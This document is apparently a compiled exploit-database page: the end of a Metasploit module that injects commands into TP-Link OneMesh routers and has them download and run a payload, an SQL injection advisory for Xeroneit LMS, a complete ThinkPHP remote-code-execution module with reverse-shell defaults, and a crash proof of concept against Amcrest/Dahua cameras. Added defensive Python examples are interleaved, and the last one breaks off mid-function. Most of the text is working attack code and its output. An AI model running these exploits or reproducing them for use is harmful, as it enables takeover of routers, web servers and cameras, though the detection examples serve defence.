      index = ((c ^ res) & 0xff) * 4
      # .reverse is needed as the target is big endian
      ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first)
      res = ref ^ (res >> 8)
    }

    checksum = ~res
    checksum_s = [(checksum)].pack('I>').force_encoding("ascii")

    # convert back to string
    packet =  packet.pack('C*').force_encoding('ascii')

    # and replace the checksum
    packet[12] = checksum_s[0]
    packet[13] = checksum_s[1]
    packet[14] = checksum_s[2]
    packet[15] = checksum_s[3]

    packet
  end

  def aes_encrypt(plaintext)
    # Function encrypts perfectly 16 bytes aligned payload
    if (plaintext.length % 16 != 0)
      return
    end

    cipher = OpenSSL::Cipher.new 'AES-128-CBC'
    # in the original C code the key and IV are 256 bits long... but they still use AES-128
    iv = "1234567890abcdef"
    key = "TPONEMESH_Kf!xn?"
    encrypted = ''
    cipher.encrypt
    cipher.iv = iv
    cipher.key = key

    # Take each 16 bytes block and encrypt it
    plaintext.scan(/.{1,16}/) { |block|
      encrypted += cipher.update(block)
    }

    encrypted
  end

  def create_injection(c)
    # Template for the command injection
    # The injection happens at "slave_mac" (read advisory for details)
    # The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions.
    # This will fail if we send a command with single quotes (')
    # ... but that's not a problem for this module, since we don't use them for our command.
    # It might also fail with double quotes (") since this will break the JSON...
    inject = "\';printf \'#{c}\'>>#{@cmd_file}\'"
    template = "{\"method\":\"slave_key_offer\",\"data\":{"\
      "\"group_id\":\"#{rand_text_numeric(1..3)}\","\
      "\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\
      "\"slave_mac\":\"%{INJECTION}\","\
      "\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\
      "\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\
      "\"want_to_join\":false,"\
      "\"model\":\"#{rand_text_alpha(5..13)}\","\
      "\"product_type\":\"#{rand_text_alpha(5..13)}\","\
      "\"operation_mode\":\"A%{PADDING}\"}}"

    # This is required to calculate exact template length without replace flags
    template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length
    # This has to be initialized to cover the situation when no padding is needed
    pad = ''
    padding = rand_text_alpha(16)
    template_len += inject.length

    # Calculate pad if padding is needed
    if (template_len % 16 != 0)
      pad = padding[0..15-(template_len % 16)]
    end

    # Here the final payload is created
    template % {INJECTION:"#{inject}", PADDING:"#{pad}"}
  end

  def update_len_field(packet, payload_length)
    new_packet = packet[0..3]
    new_packet += [payload_length].pack("S>")
    new_packet += packet[6..-1]
  end

  def exec_cmd_file(packet)
    # This function handles special action of exec
    # Returns new complete tpdp packet
    inject = "\';sh #{@cmd_file}\'"
    payload = create_injection(inject)
    ciphertext = aes_encrypt(payload)
    if not ciphertext
      fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
    end
    new_packet = packet[0..15]
    new_packet += ciphertext
    new_packet = update_len_field(new_packet, ciphertext.length)
    calc_checksum(new_packet.bytes)
  end

  # Handle incoming requests from the router
  def on_request_uri(cli, request)
    print_good("#{peer} - Sending executable to the router")
    print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
    send_response(cli, @payload_exe)
    @payload_sent = true
  end

  def exploit
    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
      fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
    end
    if datastore['SSL']
      fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it")
    end

    print_status("Attempting to exploit #{target.name}")

    tpdp_packet_template = [0x01].pack('C*') +    # packet version, fixed to 1
      [0xf0].pack('C*') +                         # set packet type to 0xf0 (onemesh)
      [0x07].pack('S>*') +                        # onemesh opcode, used by the onemesh_main switch table
      [0x00].pack('S>*') +                        # packet len
      [0x01].pack('C*') +                         # some flag, has to be 1 to enter the vulnerable onemesh function
      [0x00].pack('C*') +                         # dunno what this is
      [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can be any value
      [0x5A,0x6B,0x7C,0x8D].pack('C*')            # Checksum placeholder

    srv_host = datastore['SRVHOST']
    srv_port = datastore['SRVPORT']
    @cmd_file = rand_text_alpha_lower(1)

    # generate our payload executable
    @payload_exe = generate_payload_exe

    # Command that will download @payload_exe and execute it
    download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"

    http_service = 'http://' + srv_host + ':' + srv_port.to_s
    print_status("Starting up our web service on #{http_service} ...")
    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
      'Path' => "/#{@cmd_file}"
    }})

    print_status("#{peer} - Connecting to the target")
    connect_udp

    print_status("#{peer} - Sending command file byte by byte")
    print_status("#{peer} - Command: #{download_cmd}")
    mod = download_cmd.length / 5
    download_cmd.each_char.with_index { |c, index|
      # Generate payload
      payload = create_injection(c)
      if not payload
        fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!")
      end
      # Encrypt payload
      ciphertext = aes_encrypt(payload)
      if not ciphertext
        fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
      end
      tpdp_packet = tpdp_packet_template.dup
      tpdp_packet += ciphertext
      tpdp_packet = update_len_field(tpdp_packet, ciphertext.length)
      tpdp_packet = calc_checksum(tpdp_packet.bytes)
      udp_sock.put(tpdp_packet)
      # Sleep to make sure the payload is processed by a target
      Rex.sleep(1)

      # Print progress
      if ((index+1) % mod == 0)
        percentage = 20 * ((index+1) / mod)
        # very advanced mathematics in use here to show the progress bar
        print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]")
        if percentage == 100
          # a bit of cheating to get the last char done right
          index = -2
        end
        #print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}")
      end
    }

    # Send the exec command. From here we should receive the connection
    print_status("#{peer} - Command file sent, attempting to execute...")
    tpdp_packet = exec_cmd_file(tpdp_packet_template.dup)
    udp_sock.put(tpdp_packet)

    timeout = 0
    while not @payload_sent
      Rex.sleep(1)
      timeout += 1
      if timeout == datastore['MAX_WAIT'].to_i
        fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(")
      end
    end

    disconnect_udp
  end
end
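As an added, defender-side example (not part of the module above), the following Python parses the 16-byte TDP header the module assembles, checks the length field against the payload, recomputes the checksum the way calc_checksum does (which is plain CRC-32 over the packet with the placeholder bytes in the checksum field), and flags the onemesh type 0xf0 / opcode 7 / flag 1 shape for a network monitor. The sample packet and body are constructed here, and build_tdp, verify_tdp and is_onemesh_probe are names chosen for this example.

```python
"""Parser and integrity check for the TDP header sent to tdpServer on UDP/20002.
Added example; not part of the Metasploit module."""
import struct
import zlib

# version(1) type(1) opcode(2) len(2) flag(1) pad(1) serial(4) checksum(4), big-endian
TDP_HEADER = struct.Struct(">BBHHBB4s4s")
# bytes the module writes into the checksum field before hashing the packet
CHECKSUM_PLACEHOLDER = b"\x5a\x6b\x7c\x8d"
ONEMESH_TYPE = 0xF0
ONEMESH_VULN_OPCODE = 0x07


def crc32_table():
    """Regenerate the 256-entry CRC-32 table. The module's reference_tbl is this
    same table stored as 1024 big-endian bytes (entry 1 = 0x77073096)."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = crc32_table()


def crc32_table_driven(data):
    """Same loop as the module's calc_checksum: init 0xffffffff, byte-wise table
    lookup, final bitwise NOT. This is standard CRC-32, i.e. zlib.crc32."""
    res = 0xFFFFFFFF
    for c in data:
        res = _TABLE[(c ^ res) & 0xFF] ^ (res >> 8)
    return (~res) & 0xFFFFFFFF


def tdp_checksum(packet):
    """Checksum as the module computes it: placeholder in bytes 12..15 while
    hashing, result stored big-endian in those same bytes."""
    hashed = packet[:12] + CHECKSUM_PLACEHOLDER + packet[16:]
    return zlib.crc32(hashed) & 0xFFFFFFFF


def parse_tdp(packet):
    """Decode the header into a dict; raise ValueError on a short packet."""
    if len(packet) < TDP_HEADER.size:
        raise ValueError("short packet: %d bytes" % len(packet))
    version, ptype, opcode, length, flag, _pad, serial, checksum = TDP_HEADER.unpack_from(packet)
    return {
        "version": version, "type": ptype, "opcode": opcode, "length": length,
        "flag": flag, "serial": serial,
        "checksum": struct.unpack(">I", checksum)[0],
        "payload": packet[TDP_HEADER.size:],
    }


def verify_tdp(packet):
    """Return (ok, reason); ok only when the length field matches the payload
    and the checksum verifies. The reason names the first failed check."""
    try:
        hdr = parse_tdp(packet)
    except ValueError as exc:
        return False, str(exc)
    if hdr["length"] != len(hdr["payload"]):
        return False, "length field %d != payload %d" % (hdr["length"], len(hdr["payload"]))
    if hdr["checksum"] != tdp_checksum(packet):
        return False, "bad checksum"
    return True, "ok"


def is_onemesh_probe(packet):
    """Monitor heuristic: a well-formed onemesh packet carrying opcode 7 with the
    flag byte set to 1, the combination that reaches the vulnerable handler."""
    ok, _ = verify_tdp(packet)
    if not ok:
        return False
    hdr = parse_tdp(packet)
    return hdr["type"] == ONEMESH_TYPE and hdr["opcode"] == ONEMESH_VULN_OPCODE and hdr["flag"] == 1


def build_tdp(ptype, opcode, flag, payload, serial=b"\x00\x00\x00\x00"):
    """Assemble a header plus payload with a correct checksum (for test samples)."""
    header = TDP_HEADER.pack(1, ptype, opcode, len(payload), flag, 0, serial, CHECKSUM_PLACEHOLDER)
    packet = header + payload
    return packet[:12] + struct.pack(">I", tdp_checksum(packet)) + packet[16:]


# Constructed sample: an opaque 32-byte body standing in for the AES-CBC ciphertext.
SAMPLE_BODY = bytes(range(32))
SAMPLE_PACKET = build_tdp(ONEMESH_TYPE, ONEMESH_VULN_OPCODE, 1, SAMPLE_BODY)
```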
-
Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Google Dork: "LMS v3.0 - Xerone IT "
# Date: 2020-04-09
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link: https://xeroneit.net/portfolio/library-management-system-lms
# Software Demo: https://xeroneit.co/demo/lms/home/login
# Version: v3.0
# Category: webapps

1. Description

The script has a SQL injection in the book category parameter at this path:

/lms/home/book?category_name=00*SQLI

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3

SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as available_book, `book_info`.`number_of_books`, `book_info`.`id`, `book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as `size`, `book_info`.`publishing_year`, `book_info`.`publisher`, `book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`, `book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`, `book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'', category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21

Filename: models/Basic.php
Line Number: 284
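As an added example (not the vendor's code), the FIND_IN_SET category lookup from the error above rebuilt over SQLite with a Python-registered FIND_IN_SET, showing the string-concatenated query failing on a stray quote exactly as the 1064 error does and the parameterised form returning only matching rows. The table rows and the function names are constructed for this example.

```python
"""The category lookup behind the error above, as string concatenation (the
injectable form) and parameterised. Added example; SQLite stands in for MySQL
with FIND_IN_SET supplied as a Python function."""
import sqlite3


def find_in_set(needle, haystack):
    # MySQL FIND_IN_SET(): 1-based position of needle in a comma-separated list, 0 if absent
    if needle is None or haystack is None:
        return 0
    items = haystack.split(",")
    return items.index(needle) + 1 if needle in items else 0


def open_library_db():
    """In-memory book_info table with constructed rows; category_id holds the
    comma-separated list the application searches with FIND_IN_SET."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("FIND_IN_SET", 2, find_in_set)
    conn.execute("CREATE TABLE book_info (id INTEGER, title TEXT, category_id TEXT, deleted TEXT)")
    conn.executemany("INSERT INTO book_info VALUES (?, ?, ?, ?)", [
        (1, "Applied Cryptography", "57,12", "0"),
        (2, "The Art of Software Security Assessment", "57", "0"),
        (3, "Retired Title", "57", "1"),
        (4, "Compilers", "3", "0"),
    ])
    return conn


def books_by_category_vulnerable(conn, category):
    # user input pasted into the SQL text, the pattern the advisory's error shows
    sql = ("SELECT title FROM book_info WHERE FIND_IN_SET('%s', category_id) != 0 "
           "AND deleted = '0' ORDER BY title ASC LIMIT 21" % category)
    return [row[0] for row in conn.execute(sql)]


def books_by_category_fixed(conn, category):
    # the value travels as a bound parameter and cannot change the statement
    sql = ("SELECT title FROM book_info WHERE FIND_IN_SET(?, category_id) != 0 "
           "AND deleted = '0' ORDER BY title ASC LIMIT 21")
    return [row[0] for row in conn.execute(sql, (category,))]


def probe(conn, category):
    """Run both variants for one input; the vulnerable one's syntax error is
    returned as text so the two outcomes can be compared side by side."""
    try:
        vulnerable = books_by_category_vulnerable(conn, category)
    except sqlite3.OperationalError as exc:
        vulnerable = "error: %s" % exc
    return vulnerable, books_by_category_fixed(conn, category)
```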
-
ThinkPHP - Multiple PHP Injection RCEs (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ThinkPHP Multiple PHP Injection RCEs',
      'Description' => %q{
        This module exploits one of two PHP injection vulnerabilities in the
        ThinkPHP web framework to execute code as the web user.

        Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
        vulnerable to a separate vulnerability. The module will automatically
        attempt to detect the version of the software.

        Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
      },
      'Author' => [
        # Discovery by unknown threaty threat actors
        'wvu' # Module
      ],
      'References' => [
        # https://www.google.com/search?q=thinkphp+rce, tbh
        ['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP
        ['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
      ],
      'DisclosureDate' => '2018-12-10', # Unknown discovery date
      'License' => MSF_LICENSE,
      'Platform' => ['unix', 'linux'],
      'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged' => false,
      'Targets' => [
        ['Unix Command',
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Type' => :unix_cmd,
          'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
        ],
        ['Linux Dropper',
          'Platform' => 'linux',
          'Arch' => [ARCH_X86, ARCH_X64],
          'Type' => :linux_dropper,
          'DefaultOptions' => {
            'CMDSTAGER::FLAVOR' => :curl,
            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
          }
        ]
      ],
      'DefaultTarget' => 1,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    register_advanced_options([
      # NOTE: You may want to tweak this for long-running commands like find(1)
      OptFloat.new('CmdOutputTimeout',
                   [true, 'Timeout for cmd/unix/generic output', 3.5])
    ])

    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
    import_target_defaults
  end

=begin
wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /index.php?s=1353 HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 404 Not Found
< Date: Mon, 13 Apr 2020 06:42:15 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.5
< Content-Length: 7332
< Content-Type: text/html; charset=utf-8
<
{ [7332 bytes data]
* Connection #0 to host 127.0.0.1 left intact
5.0.20wvu@kharak:~$
=end
  def check
    # An unknown route will trigger the ThinkPHP copyright with version
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {'s' => rand_text_alpha(8..42)}
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)
      return CheckCode::Unknown(
        'Target did not respond with ThinkPHP copyright.'
      )
    end

    # Get the first copyright <span> containing the version
    version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text

    # guard the nil case before scanning, so a missing <span> reports Detected instead of raising
    unless version && (version = version.scan(/^V([\d.]+)$/).flatten.first)
      return CheckCode::Detected(
        'Target did not respond with ThinkPHP version.'
      )
    end

    # Make the parsed version a comparable ivar for automatic exploitation
    @version = Gem::Version.new(version)

    if @version <= Gem::Version.new('5.0.23')
      return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.")
    end

    CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # This is just extra insurance in case I screwed up the check method
    unless @version
      fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')
    end

    print_status("Targeting ThinkPHP #{@version} automatically")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # XXX: Only opts[:noconcat] may induce responses from the server
      execute_cmdstager
    else
      # This is just extra insurance in case I screwed up the info hash
      fail_with(Failure::NoTarget, "Could not select target #{target['Type']}")
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    if @version < Gem::Version.new('5.0.23')
      exploit_less_than_5_0_23(cmd)
    elsif @version == Gem::Version.new('5.0.23')
      exploit_5_0_23(cmd)
    else
      # This is just extra insurance in case I screwed up the exploit method
      fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}")
    end
  end

=begin
wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 13 Apr 2020 06:43:45 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.5
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [60 bytes data]
* Connection #0 to host 127.0.0.1 left intact
uid=33(www-data) gid=33(www-data) groups=33(www-data)
wvu@kharak:~$
=end
  def exploit_less_than_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {
        's' => '/Index/\\think\\app/invokefunction',
        'function' => 'call_user_func_array',
        'vars[0]' => 'system', # TODO: Debug ARCH_PHP
        'vars[1][]' => cmd
      },
      'partial' => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # HACK: Print half of the doubled-up command output
    vprint_line(res.body[0, res.body.length / 2])
  end

=begin
wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
> POST /index.php?s=captcha HTTP/1.1
> Host: 127.0.0.1:8081
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Length: 72
> Content-Type: application/x-www-form-urlencoded
>
} [72 bytes data]
* upload completely sent off: 72 out of 72 bytes
< HTTP/1.1 200 OK
< Date: Mon, 13 Apr 2020 06:44:05 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.12
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [60 bytes data]
* Connection #0 to host 127.0.0.1 left intact
uid=33(www-data) gid=33(www-data) groups=33(www-data)
wvu@kharak:~$
=end
  def exploit_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {'s' => 'captcha'},
      'vars_post' => {
        '_method' => '__construct',
        'filter[]' => 'system', # TODO: Debug ARCH_PHP
        'method' => 'get',
        'server[REQUEST_METHOD]' => cmd
      },
      'partial' => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # Clean up output from cmd/unix/generic
    vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, ''))
  end

end
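An added detection example, not from either module: it classifies the request shapes shown in the ThinkPHP transcripts above and in the Liferay JSONWS module earlier on this page, working from proxy or WAF records that retain the POST body (plain access logs lack the body the Liferay and ThinkPHP 5.0.23 rules need). The rule names, classify_request, scan_records and the sample records are constructed for this example.

```python
"""Classifier for the JSONWS and ThinkPHP request shapes used by the modules on
this page. Added example; works on (method, request-target, body) records."""
from urllib.parse import parse_qs, urlsplit

LIFERAY_JSONWS_PREFIX = "/api/jsonws/"
C3P0_GADGET_CLASS = "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"


def _params(encoded):
    # form-decode a query string or body; keys such as filter[] and vars[1][] stay verbatim
    return parse_qs(encoded, keep_blank_values=True)


def classify_request(method, target, body=""):
    """Return the list of rule names matched by one request (empty when clean)."""
    parts = urlsplit(target)
    path, query = parts.path, _params(parts.query)
    form = _params(body) if body else {}
    hits = []

    # ThinkPHP < 5.0.23: route injection reaching think\app::invokefunction
    s_values = " ".join(query.get("s", [])).lower().replace("\\", "/")
    if "think/app/invokefunction" in s_values or "call_user_func_array" in query.get("function", []):
        hits.append("thinkphp-invokefunction")

    # ThinkPHP 5.0.23: POST ?s=captcha with _method=__construct and a filter[] callback
    if (method.upper() == "POST" and query.get("s") == ["captcha"]
            and form.get("_method") == ["__construct"] and "filter[]" in form):
        hits.append("thinkphp-captcha-construct")

    # Liferay JSONWS: a typed "+defaultData" parameter naming the c3p0 gadget class,
    # or a HexAsciiSerializedMap blob, in any JSON web service call
    if path.startswith(LIFERAY_JSONWS_PREFIX):
        blob = " ".join(form.get("defaultData.userOverridesAsString", []))
        if C3P0_GADGET_CLASS in form.get("+defaultData", []) or blob.startswith("HexAsciiSerializedMap:"):
            hits.append("liferay-jsonws-c3p0")

    return hits


def scan_records(records):
    """Map record index to matched rules, omitting records with no hits."""
    findings = {}
    for i, (method, target, body) in enumerate(records):
        hits = classify_request(method, target, body)
        if hits:
            findings[i] = hits
    return findings


# Constructed sample records (method, target, body): the first three mirror the
# shapes in the modules, the last two are ordinary traffic for contrast.
SAMPLE_RECORDS = [
    ("GET", "/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array"
            "&vars[0]=system&vars[1][]=id", ""),
    ("POST", "/index.php?s=captcha",
     "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"),
    ("POST", "/api/jsonws/expandocolumn/update-column",
     "columnId=12&name=13&type=14&%2BdefaultData=com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
     "&defaultData.userOverridesAsString=HexAsciiSerializedMap%3Aaced0005%3B"),
    ("GET", "/index.php?s=captcha", ""),
    ("POST", "/api/jsonws/user/get-current-user", "p_auth=abc"),
]
```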
-
Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
# Date: 2020-04-07
# Exploit Author: Jacob Baines
# Vendor Homepage: https://amcrest.com/
# Software Link: https://amcrest.com/firmwaredownloads
# Version: Many different versions due to number of Dahua/Amcrest/etc
# devices affected
# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5
# 4.000.00AC000.0
# CVE : CVE-2020-5735
# Advisory: https://www.tenable.com/security/research/tra-2020-20

# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash
# (Python 2 script: it relies on the legacy md5 module and str byte strings)

import argparse
import hashlib
import socket
import struct
import sys
import md5
import re

## DDNS test functionality. Stack overflow via memcpy

def recv_response(sock):
    # minimum size is 32 bytes
    header = sock.recv(32)

    # check we received enough data
    if len(header) != 32:
        print 'Invalid response. Too short'
        return (False, '', '')

    # extract the payload length field
    length_field = header[4:8]
    payload_length = struct.unpack_from('I', length_field)
    payload_length = payload_length[0]

    # uhm... lets be restrictive of accepted lengths
    if payload_length < 0 or payload_length > 4096:
        print 'Invalid response. Bad payload length'
        return (False, header, '')

    if (payload_length == 0):
        return (True, header, '')

    payload = sock.recv(payload_length)
    if len(payload) != payload_length:
        print 'Invalid response. Bad received length'
        return (False, header, payload)

    return (True, header, payload)

def sofia_hash(msg):
    # Dahua's 8-character alphanumeric digest of the password
    h = ""
    m = hashlib.md5()
    m.update(msg)
    msg_md5 = m.digest()
    for i in range(8):
        n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
        if n > 9:
            if n > 35:
                n += 61
            else:
                n += 55
        else:
            n += 0x30
        h += chr(n)
    return h

top_parser = argparse.ArgumentParser(description='lol')
top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="37777")
top_parser.add_argument('-u', '--username', action="store", dest="username", help="The user to login as", default="admin")
top_parser.add_argument('--pass', action="store", dest="password", required=True, help="The password to use")
args = top_parser.parse_args()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"

# send the old style login request. We'll use blank hashes. This should
# trigger a challenge from new versions of the camera
old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" +
             "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash
             "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash
             "\x05\x02\x00\x01\x00\x00\xa1\xaa")
sock.sendall(old_login)

(success, header, challenge) = recv_response(sock)
if success == False or not challenge:
    print 'Failed to receive the challenge'
    print challenge
    sys.exit(0)

# extract the realm and random seed
seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n", challenge)
if seeds == None:
    print 'Failed to extract realm and random seed.'
    print challenge
    sys.exit(0)

realm = seeds.group(1)
random = seeds.group(2)

# compute the response
realm_hash = md5.new(args.username + ":" + realm + ":" + args.password).hexdigest().upper()
random_hash = md5.new(args.username + ":" + random + ":" + realm_hash).hexdigest().upper()
sofia_result = sofia_hash(args.password)
final_hash = md5.new(args.username + ":" + random + ":" + sofia_result).hexdigest().upper()

# the payload length field used to be hard-coded as 0x47, which is only
# correct for the 5-character username "admin"; compute it instead
challenge_body = args.username + "&&" + random_hash + final_hash
challenge_resp = ("\xa0\x05\x00\x60" + struct.pack("I", len(challenge_body)) +
                  "\x00\x00\x00\x00\x00\x00\x00\x00" +
                  "\x00\x00\x00\x00\x00\x00\x00\x00" +
                  "\x05\x02\x00\x08\x00\x00\xa1\xaa" +
                  challenge_body)
sock.sendall(challenge_resp)

(success, header, payload) = recv_response(sock)
if success == False or not header:
    print 'Failed to receive the session id'
    sys.exit(0)

session_id_bin = header[16:20]
session_id_int = struct.unpack_from('I', session_id_bin)
if session_id_int[0] == 0:
    print "Log in failed."
    sys.exit(0)

session_id = session_id_int[0]
print "[+] Session ID: " + str(session_id)

# firmware version: an over-long "Protocol:" value overflows the stack buffer
command = "Protocol: " + ("a" * 0x300) + "\r\n"
command_length = struct.pack("I", len(command))
firmware = ("\x62\x00\x00\x00" + command_length +
            "\x04\x00\x00\x00\x00\x00\x00\x00" +
            "\x00\x00\x00\x00\x00\x00\x00\x00" +
            "\x00\x00\x00\x00\x00\x00\x00\x00" +
            command)
sock.sendall(firmware)

(success, header, firmware_string) = recv_response(sock)
if success == False and not header:
    print "[!] Probably crashed the server."
else:
    print "[+] Attack failed."
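The port-37777 login exchange the PoC drives, rewritten as Python 3 builders and parsers. This is an added example, not the advisory's PoC: the 32-byte frame layout (little-endian payload length at offset 4, session id at offset 16), the Realm/Random challenge format and the three-hash response are taken from the PoC above, while FakeCamera is a constructed stand-in (it does not verify the hashes) so the exchange can be exercised offline.

```python
"""Dahua/Amcrest port 37777 login exchange as Python 3 builders and parsers.
Added example, not the advisory's PoC. FakeCamera is a constructed stand-in."""
import hashlib
import re
import struct

HEADER_LEN, MAX_PAYLOAD = 32, 4096
CHALLENGE_RE = re.compile(rb"Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n")


def sofia_hash(password: bytes) -> str:
    """Dahua's 8-character alphanumeric digest of the password."""
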